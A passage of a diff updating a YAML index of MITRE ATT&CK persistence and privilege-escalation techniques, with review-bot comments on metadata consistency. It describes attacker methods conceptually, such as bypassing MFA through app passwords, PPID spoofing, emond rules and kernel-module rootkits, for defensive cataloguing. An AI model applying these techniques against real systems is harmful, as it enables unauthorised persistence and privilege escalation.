+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -19603,6 +19909,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
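Review bot: the `x_mitre_detection` text that follows the new contributor line still covers only Azure Activity Log changes to Service Principals and Applications plus SSH-key create/import APIs, while the description expanded in this same object now also describes AWS `CreateLoginProfile` console passwords and Entra ID app passwords. That mismatch is upstream ATT&CK content and should not be patched in the index, but it is worth raising upstream so the detection guidance catches up with the two newly described credential types.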
@@ -19611,13 +19918,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -19643,10 +19953,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
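Review bot: the new `Lacework AI Resource Hijacking 2024` reference is formatted title-first (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), whereas every surrounding entry, including the new `Permiso Scattered Spider 2023` one, follows the author-first `Author. (date). Title.` pattern. Both new `source_name` values are resolved by `(Citation: ...)` markers in the updated description, so the references are complete; the formatting inconsistency is upstream and only worth a note if the index is post-processed for display.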
@@ -19655,10 +19973,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19675,9 +20003,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
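Review bot: T1098.001 ends up with no `x_mitre_attack_spec_version` and no `x_mitre_modified_by_ref` at all, because both are removed here together with `spec_version`. Elsewhere in this patch those two keys are kept (T1134.003, T1546.003) or re-added as `x_mitre_attack_spec_version: 3.2.0` plus the identity ref (T1546.001, T1078), so dropping them for this one object looks unintended; restore the two lines and remove only `spec_version: '2.1'`, which is the change the rest of the patch makes consistently.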
@@ -19741,7 +20066,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19830,7 +20154,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -19888,7 +20211,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
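Review bot: the `modified` timestamp for T1134.004 moves backwards, from `2022-05-24T14:00:00.188Z` to `2022-05-03T02:15:42.360Z`. The same backward move recurs later in this patch for T1055.014, T1546.014, T1574.010 and T1574.013, and in every case the old value shares the `14:00:00.188Z` time of day, which looks like a bulk placeholder rather than a real upstream value. Confirm the new timestamps match the `modified` field of the upstream ATT&CK STIX objects; if they do, a one-line note in the commit message explaining why some timestamps regress would save the next reviewer the same question.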
@@ -19913,12 +20236,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -19944,7 +20266,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -19958,7 +20279,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -19985,8 +20305,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -19997,7 +20317,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
@@ -20068,7 +20389,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20095,7 +20416,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20135,7 +20455,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20155,12 +20475,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20214,11 +20533,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20305,9 +20623,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20320,12 +20638,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20361,16 +20678,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
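Review bot: the platform list for T1098 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped from `2.6` to `2.7`; the same rename appears for T1078 later in this patch. Any consumer or generated per-platform index that filters on the removed platform names will silently get zero matches for these techniques after this change, so the per-platform index files and any platform filter in the build scripts should be updated in the same change, and the commit message should call out the rename explicitly.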
@@ -20411,143 +20727,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
